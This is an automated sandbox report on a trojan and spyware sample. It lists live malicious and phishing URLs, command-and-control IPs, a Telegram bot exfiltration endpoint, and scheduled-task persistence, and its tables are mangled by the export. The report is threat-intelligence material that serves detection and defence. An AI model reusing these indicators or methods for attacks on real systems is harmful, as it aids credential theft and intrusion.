http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PO#_1100015533.scr, 00000000.00000002.386365175.0000000002931000.00000004.00000800.00020000.00000000.sdmp; hVVSnrrP.exe, 0000000A.00000002.577498436.00000000022D1000.00000004.00000800.00020000.00000000.sdmp; Microsofts.exe, 0000000E.00000002.643206935.0000000002691000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000010.00000002.401578021.0000000002141000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ww7.przvgke.biz/ | hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://reallyfreegeoip.org/xml/ | PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp; Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp; Microsofts.exe, 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp; Microsofts.exe.8.dr | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | armsvc.exe, 0000000B.00000003.493747388.0000000001C80000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=fwiwk.biz | armsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmp | false |
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://contoso.com/Iconpowershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://checkip.dyndns.orgMicrosofts.exe, 0000000E.00000002.643206935.0000000002704000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://54.244.188.177/rmrhacpxarmsvc.exe, 0000000B.00000002.639468285.00000000006E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://reallyfreegeoip.orgMicrosofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://crl.entrust.net/2048ca.crl0Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    http://54.244.188.177/crsFLLcpPO#_1100015533.scr, 00000008.00000002.387118499.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://.exearmsvc.exe, 0000000B.00000003.585874459.0000000001480000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://ocsp.entrust.net03Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      http://54.244.188.177/rmrhacpxLarmsvc.exe, 0000000B.00000002.639468285.00000000006E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://contoso.com/Licensepowershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://schemas.xmlsoap.org/soap/envelope/armsvc.exe, 0000000B.00000003.493747388.0000000001C80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640CbhVVSnrrP.exe, 00000035.00000002.567934551.0000000000B3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://82.112.184.197/yhhdkvrarmsvc.exe, 0000000B.00000003.584866410.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640LocationETagAuthentication-InfoAgeAccephVVSnrrP.exe, 00000035.00000002.567934551.0000000000B7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://contoso.com/powershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            http://54.244.188.177/crsPO#_1100015533.scr, 00000008.00000002.387118499.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            http://reallyfreegeoip.orgMicrosofts.exe, 0000000E.00000002.643206935.000000000272D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              http://checkip.dyndns.comMicrosofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                http://ocsp.entrust.net0DMicrosofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  http://82.112.184.197/savrhhvarmsvc.exe, 0000000B.00000003.584866410.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    http://crl.entrust.net/server1.crl0Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      http://ww12.fwiwk.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjl8fHx8fHw2Nzg3YTJmYjY5OWarmsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        http://ww7.fwiwk.biz/lderrm?usid=20&utid=14164936613armsvc.exe, 0000000B.00000002.639468285.00000000006CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        • Avira URL Cloud: phishing
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        https://secure.comodo.com/CPS0Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                          http://checkip.dyndns.comXMicrosofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          http://checkip.dyndns.orgXMicrosofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://api.telegram.org/bot-/sendDocument?chat_id=PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.drfalse
                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                            http://35.164.78.200/armsvc.exe, 0000000B.00000002.639468285.00000000006C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            208.117.43.225
                                                                                                                                                                                                                                                            gytujflc.bizUnited States
                                                                                                                                                                                                                                                            32748STEADFASTUSfalse
                                                                                                                                                                                                                                                            72.52.178.23
                                                                                                                                                                                                                                                            fwiwk.bizUnited States
                                                                                                                                                                                                                                                            32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                                                            76.223.26.96
                                                                                                                                                                                                                                                            084725.parkingcrew.netUnited States
                                                                                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                                                                                            44.221.84.105
                                                                                                                                                                                                                                                            saytjshyf.bizUnited States
                                                                                                                                                                                                                                                            14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                            54.244.188.177
                                                                                                                                                                                                                                                            oshhkdluh.bizUnited States
                                                                                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                                                                                            13.251.16.150
                                                                                                                                                                                                                                                            ifsaia.bizUnited States
                                                                                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                                                                                            47.129.31.212
                                                                                                                                                                                                                                                            xlfhhhm.bizCanada
                                                                                                                                                                                                                                                            34533ESAMARA-ASRUfalse
                                                                                                                                                                                                                                                            18.246.231.120
                                                                                                                                                                                                                                                            jpskm.bizUnited States
                                                                                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                                                                                            82.112.184.197
                                                                                                                                                                                                                                                            vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                            43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                                                                                                                            18.141.10.107
                                                                                                                                                                                                                                                            ssbzmoy.bizUnited States
                                                                                                                                                                                                                                                            16509AMAZON-02USfalse
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1591772
Start date and time: 2025-01-15 12:56:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 56
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO#_1100015533.scr
Detection: MAL
Classification: mal100.spre.troj.spyw.evad.winSCR@52/53@63/19
Cookbook Comments:
• Found application associated with file extension: .scr
• Exclude process from analysis (whitelisted): dllhost.exe, wmpnetwk.exe, VSSVC.exe, SearchIndexer.exe, OSE.EXE, sppsvc.exe, FlashPlayerUpdateService.exe, WMIADAP.exe, conhost.exe, WmiApSrv.exe, spsys.sys, mscorsvw.exe
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:57:04 | Task Scheduler | Run new task: hVVSnrrP path: C:\Users\user\AppData\Roaming\hVVSnrrP.exe
03:57:12 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
03:57:18 | Task Scheduler | Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
06:56:57 | API Interceptor | 75x Sleep call for process: PO#_1100015533.scr modified
06:57:00 | API Interceptor | 157x Sleep call for process: powershell.exe modified
06:57:02 | API Interceptor | 5x Sleep call for process: schtasks.exe modified
06:57:04 | API Interceptor | 166x Sleep call for process: taskeng.exe modified
06:57:05 | API Interceptor | 3534x Sleep call for process: armsvc.exe modified
06:57:07 | API Interceptor | 279x Sleep call for process: hVVSnrrP.exe modified
06:57:07 | API Interceptor | 5203x Sleep call for process: Microsofts.exe modified
06:57:07 | API Interceptor | 274x Sleep call for process: Trading_AIBot.exe modified
06:57:08 | API Interceptor | 200x Sleep call for process: alg.exe modified
06:57:13 | API Interceptor | 317x Sleep call for process: aspnet_state.exe modified
06:57:24 | API Interceptor | 111x Sleep call for process: ehrecvr.exe modified
06:57:26 | API Interceptor | 183x Sleep call for process: ehsched.exe modified
06:57:28 | API Interceptor | 1x Sleep call for process: FXSSVC.exe modified
06:57:29 | API Interceptor | 170x Sleep call for process: ieetwcollector.exe modified
06:57:31 | API Interceptor | 1x Sleep call for process: maintenanceservice.exe modified
06:57:34 | API Interceptor | 354x Sleep call for process: msdtc.exe modified
06:57:35 | API Interceptor | 195x Sleep call for process: msiexec.exe modified
06:57:38 | API Interceptor | 761x Sleep call for process: perfhost.exe modified
06:57:39 | API Interceptor | 146x Sleep call for process: snmptrap.exe modified
06:57:44 | API Interceptor | 133x Sleep call for process: vds.exe modified
06:57:56 | API Interceptor | 146x Sleep call for process: wbengine.exe modified
06:58:01 | API Interceptor | 970x Sleep call for process: apihost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.248.148.254 | SABXJ1B5c8.exe | malicious | MassLogger RAT
• ww12.przvgke.biz/sbjeah?usid=27&utid=10450772717
| PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer
• ww12.przvgke.biz/ewl?usid=27&utid=10221865931
| HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT
• ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334
| PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer
• ww12.przvgke.biz/fauopp?usid=18&utid=28672494417
| Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer
• ww12.przvgke.biz/jenyp?usid=26&utid=9204704395
| http://begantotireo.xyz | malicious | Unknown
• ww38.begantotireo.xyz/favicon.ico
| http://begantotireo.xyz | malicious | Unknown
                                                                                                                                                                                                                                                            • ww38.begantotireo.xyz/favicon.ico
                                                                                                                                                                                                                                                            http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20LutheranGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • ww38.watchdogsecurity.online/favicon.ico
                                                                                                                                                                                                                                                            65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                                                                                                                                                                                                                            • ww12.icodeps.com/?usid=26&utid=7334446481
                                                                                                                                                                                                                                                            eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • ww38.fmoovies.to/
                                                                                                                                                                                                                                                            3.94.10.34RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                            • gvijgjwkh.biz/oyfrpxy
                                                                                                                                                                                                                                                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • ytctnunms.biz/lwt
                                                                                                                                                                                                                                                            Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • ctdtgwag.biz/svjoivwb
                                                                                                                                                                                                                                                            C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • gvijgjwkh.biz/txfroxnfrj
                                                                                                                                                                                                                                                            IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • gvijgjwkh.biz/pggbsfikilutqo
                                                                                                                                                                                                                                                            Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • gvijgjwkh.biz/xfpfkqjakhgaed
                                                                                                                                                                                                                                                            Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                                                            • ctdtgwag.biz/vhxrnsynbee
                                                                                                                                                                                                                                                            8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                            • lygynud.com/login.php
                                                                                                                                                                                                                                                            7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                            • lygynud.com/login.php
                                                                                                                                                                                                                                                            UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                            • lymyxid.com/login.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
----- | ---------------------------- | --------- | ----------- | -------
jpskm.biz | RJKUWSGxej.exe | malicious | AgentTesla, RedLine | 18.246.231.120
jpskm.biz | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 18.246.231.120
jpskm.biz | invoice_96.73.exe | malicious | FormBook | 18.246.231.120
jpskm.biz | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 18.246.231.120
jpskm.biz | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 34.211.97.45
jpskm.biz | IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 34.211.97.45
jpskm.biz | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 34.211.97.45
jpskm.biz | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 34.211.97.45
jpskm.biz | AENiBH7X1q.exe | malicious | PureLog Stealer, RedLine | 34.211.97.45
jpskm.biz | E_dekont.cmd | malicious | DBatLoader, Nitol, PureLog Stealer, XWorm | 34.211.97.45
oshhkdluh.biz | RJKUWSGxej.exe | malicious | AgentTesla, RedLine | 54.244.188.177
oshhkdluh.biz | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 54.244.188.177
oshhkdluh.biz | invoice_96.73.exe | malicious | FormBook | 54.244.188.177
oshhkdluh.biz | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 54.244.188.177
oshhkdluh.biz | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 54.244.188.177
oshhkdluh.biz | IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 54.244.188.177
oshhkdluh.biz | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 54.244.188.177
oshhkdluh.biz | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 54.244.188.177
oshhkdluh.biz | AENiBH7X1q.exe | malicious | PureLog Stealer, RedLine | 54.244.188.177
oshhkdluh.biz | E_dekont.cmd | malicious | DBatLoader, Nitol, PureLog Stealer, XWorm | 54.244.188.177
76899.bodis.com | RJKUWSGxej.exe | malicious | AgentTesla, RedLine | 199.59.243.228
76899.bodis.com | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 199.59.243.227
76899.bodis.com | REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | 199.59.243.227
76899.bodis.com | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 199.59.243.227
76899.bodis.com | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 199.59.243.227
76899.bodis.com | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 199.59.243.227
76899.bodis.com | http://readabilityscore.com | malicious | Unknown | 199.59.243.226
76899.bodis.com | http://bonalluterser.com/ | malicious | Unknown | 199.59.243.226
76899.bodis.com | file.exe | malicious | LummaC, Glupteba, SmokeLoader, Stealc, Xmrig | 199.59.243.225
76899.bodis.com | S23UhdW5DH.exe | malicious | LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc | 199.59.243.225
                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                            AMAZON-02US9179390927_20250115_155451.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 13.33.187.68
                                                                                                                                                                                                                                                            https://www.pdfforge.org/pdfcreator?srsltid=AfmBOoq1lpA5qNxfcLUyxjmEXAioeKYtqPTpBsIbZ5VOdq3uhOg1WclGGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 52.29.116.175
| https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSPT0wVekqsfeOZRSaz9d28itE0eTxOetbwlGaCx05rQJywXo_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aRXzCg4yzvno75Wb80hSd5kw8Ua5r4R2pwCFTS4zDFYiEkWB-2BYk1VUWtpkJwb9IQIMAq1SSLT005wiJ2XiGw1jPEr6v61MJQRnC7AeLVtxYgqGlydBoPFbs1IP04-2BxPajuRI3fTsnzWZ9ty3RasYpwuqdrF0E8VoyYkggeeLEm9ENK69uYTCVHWHpxCPkzirQSIkvpt5FNZojg491ibS35IgO0LPU5gnpEaeaUj4-2BZoFUHIAAzMMy-2BYqsZ9F9Ldu1c-3D#X | Get hash | malicious | HTMLPhisher | Browse | 18.245.60.74
| na.elf | Get hash | malicious | Prometei | Browse | 54.171.230.55
| na.elf | Get hash | malicious | Prometei | Browse | 54.171.230.55
| boatnet.arm7.elf | Get hash | malicious | Mirai | Browse | 54.171.230.55
| arm5.elf | Get hash | malicious | Mirai | Browse | 54.171.230.55
| Invdoc80.pdf | Get hash | malicious | HTMLPhisher | Browse | 52.219.125.106
| https://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmn | Get hash | malicious | HTMLPhisher | Browse | 18.245.86.58
| XB6SkLK7Al.dll | Get hash | malicious | Wannacry | Browse | 3.121.114.254
AMAZON-AES US | https://www.pdfforge.org/pdfcreator?srsltid=AfmBOoq1lpA5qNxfcLUyxjmEXAioeKYtqPTpBsIbZ5VOdq3uhOg1WclG | Get hash | malicious | Unknown | Browse | 52.86.216.144
| https://hello-messaging2-1971-naxpbw.twil.io/index.html | Get hash | malicious | Unknown | Browse | 23.20.213.180
| https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/Computer-Zubehoer/b/?ie=UTF8&node=340843031&ref_=nav_cs_pc | Get hash | malicious | Unknown | Browse | 34.192.22.99
| https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unk | Get hash | malicious | Unknown | Browse | 34.192.22.99
| https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/NYNY25/?_encoding=UTF8&pd_rd_w=WqHp4&content-id=amzn1.sym.33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_p=33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unk | Get hash | malicious | Unknown | Browse | 44.215.133.88
| https://amhsbz.sbs/ | Get hash | malicious | Unknown | Browse | 3.5.27.125
| https://informed.deliveryery.top/us/ | Get hash | malicious | HTMLPhisher | Browse | 3.220.72.252
| https://suman006723213.github.io/garena.reward.ff/ | Get hash | malicious | HTMLPhisher | Browse | 54.225.89.216
| https://api-smartdappsfix.pages.dev/ | Get hash | malicious | HTMLPhisher | Browse | 34.192.226.125
| http://telemgram-rv.org/ | Get hash | malicious | HTMLPhisher | Browse | 35.153.197.139
AMAZON-02 US | 9179390927_20250115_155451.html | Get hash | malicious | HTMLPhisher | Browse | 13.33.187.68
| https://www.pdfforge.org/pdfcreator?srsltid=AfmBOoq1lpA5qNxfcLUyxjmEXAioeKYtqPTpBsIbZ5VOdq3uhOg1WclG | Get hash | malicious | Unknown | Browse | 52.29.116.175
| https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSPT0wVekqsfeOZRSaz9d28itE0eTxOetbwlGaCx05rQJywXo_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aRXzCg4yzvno75Wb80hSd5kw8Ua5r4R2pwCFTS4zDFYiEkWB-2BYk1VUWtpkJwb9IQIMAq1SSLT005wiJ2XiGw1jPEr6v61MJQRnC7AeLVtxYgqGlydBoPFbs1IP04-2BxPajuRI3fTsnzWZ9ty3RasYpwuqdrF0E8VoyYkggeeLEm9ENK69uYTCVHWHpxCPkzirQSIkvpt5FNZojg491ibS35IgO0LPU5gnpEaeaUj4-2BZoFUHIAAzMMy-2BYqsZ9F9Ldu1c-3D#X | Get hash | malicious | HTMLPhisher | Browse | 18.245.60.74
| na.elf | Get hash | malicious | Prometei | Browse | 54.171.230.55
| na.elf | Get hash | malicious | Prometei | Browse | 54.171.230.55
| boatnet.arm7.elf | Get hash | malicious | Mirai | Browse | 54.171.230.55
| arm5.elf | Get hash | malicious | Mirai | Browse | 54.171.230.55
| Invdoc80.pdf | Get hash | malicious | HTMLPhisher | Browse | 52.219.125.106
| https://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmn | Get hash | malicious | HTMLPhisher | Browse | 18.245.86.58
| XB6SkLK7Al.dll | Get hash | malicious | Wannacry | Browse | 3.121.114.254
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
05af1f5ca1b87cc9cc9b25185115607d | Payment Swift Advice-398379.xlsx | Get hash | malicious | Unknown | Browse | 104.21.80.1
| ILxa85qCjP.js | Get hash | malicious | Unknown | Browse | 104.21.80.1
| File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk | Get hash | malicious | Unknown | Browse | 104.21.80.1
| Pago.xls | Get hash | malicious | AveMaria, UACMe | Browse | 104.21.80.1
| NB PO-104105107108.xls | Get hash | malicious | Unknown | Browse | 104.21.80.1
| rcNDmdah2W.doc | Get hash | malicious | Unknown | Browse | 104.21.80.1
| SLNA_Updated_Medical_Grant_Application(1).docx | Get hash | malicious | Unknown | Browse | 104.21.80.1
| CMR ART009.docx | Get hash | malicious | Unknown | Browse | 104.21.80.1
| Cot90012ARCACONTAL.xls | Get hash | malicious | Remcos | Browse | 104.21.80.1
| Euro confirmation Sp.xls | Get hash | malicious | Unknown | Browse | 104.21.80.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\Microsofts.exe | PO#3_RKG367.bat | Get hash | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | Browse |
